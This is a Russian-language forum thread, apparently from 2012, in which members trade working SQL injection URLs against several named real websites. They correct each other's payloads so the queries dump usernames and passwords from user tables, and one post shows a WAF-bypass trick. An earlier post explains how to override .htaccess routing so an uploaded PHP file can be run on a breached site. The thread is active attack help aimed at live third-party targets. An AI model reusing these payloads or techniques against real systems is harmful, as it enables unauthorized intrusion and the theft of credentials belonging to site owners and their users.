ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.05.2012, 19:50
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Господа. Вы иногда просто поражаете. Если уж взялись изучать такую, собственно требующую весьма разносторонних знаний область как хак, то будьте уж добры готовы рыть носом тонны мануалов. Если бы вы забили в гугл сигнатуру ошибки - то быстро бы нашли ответ что это явно говорит о том, что сайт построен на zendFramework. А в нем родном, все идет через .htaccess идущий в корне на уровне логики приложения. И линк к .php файлу ретранслируется в соответствии с правилами заложенными в этот .htaccess. Вот отсюда и ошибка и невозможность получить прямой доступ к залитому .php файлу НЕ ЯВЛЯЮЩЕМУСЯ сегментом структуры сайта.
А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.
B: Если есть субдомены у сайта то можно через них попробовать .
C: Пустой htaccess и не даст результата потому, что в нем нет ничего что позволило бы отменить обращение к php файлу как к контроллеру.
D: Вероятно среди папок сайта есть такие на которые не распространяются правила роутинга.
|
|
|
11.05.2012, 22:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от Cennarios
Cennarios said:
А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.
а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен
|
|
|
|
11.05.2012, 23:21
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от qaz
qaz said:
а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен
На неделе, как будет время оформлю пост на эту тему. Сейчас ,к сожалению, проблема с временем.
|
|
|
|
12.05.2012, 14:19
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!
Код:
Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--
|
|
|
|
12.05.2012, 14:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от cipa21
cipa21 said:
Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!
Код:
Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+(0x6D7973716C2E75736572)+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+mamb_users+limit+0,1--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)--
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28+from+tli_users)--+
читай мануал
|
|
|
|
12.05.2012, 14:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
cipa21,
я не хочу говорить "читай мануал", но "читай мануал".
Смотри:
from+(0x6D7973716C2E75736572)
Такое только в кошмарах приснится, нельзя тут хекс юзать.
И вообще там WAF стоит, обходится так:
Код:
Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+/*!select*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+f
Версия 5.1.56
|
|
|
|
13.05.2012, 17:10
|
|
Новичок
Регистрация: 09.04.2009
Сообщений: 8
Провел на форуме:
71852
Репутация:
0
|
|
И снова я... Здрасьти...
Код:
Code:
http://www.chnlawyer.org/index.php?option=com_ask&task=ask&act=view&ID=21&menuid=1+union+select+@@version
information_schema не доступен. Брут таблиц результата не дал. Есть предложения? |
|
|
|
13.05.2012, 21:58
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
У вас 4ая версия Mysql. В ней еще не было Information_schema! Здесь только вариант брута!
|
|
|
|
14.05.2012, 12:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
http://hotel-booking-russia.com/catalog-hotel.shtml?id=11%20and%201=2%20union%20select%201 ,2,3,4,COLUMN_NAME,6,7,COLUMN_NAME%20from%20INFORM ATION_SCHEMA.COLUMNS%20Where%20table_name=%27test_ customers%27%20limit%202,1 не могу найти админа.
|
|
|
|
14.05.2012, 13:24
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
to ReV0LVeR
Код:
Code:
http://hotel-booking-russia[dot]com/catalog-hotel.shtml?id=-11+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,uid,login,password,level)+from+test_user+limit+0,1#
Ищите здесь админа, там несколько уровней у пользователей, я не смотрел кто там именно админ! |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
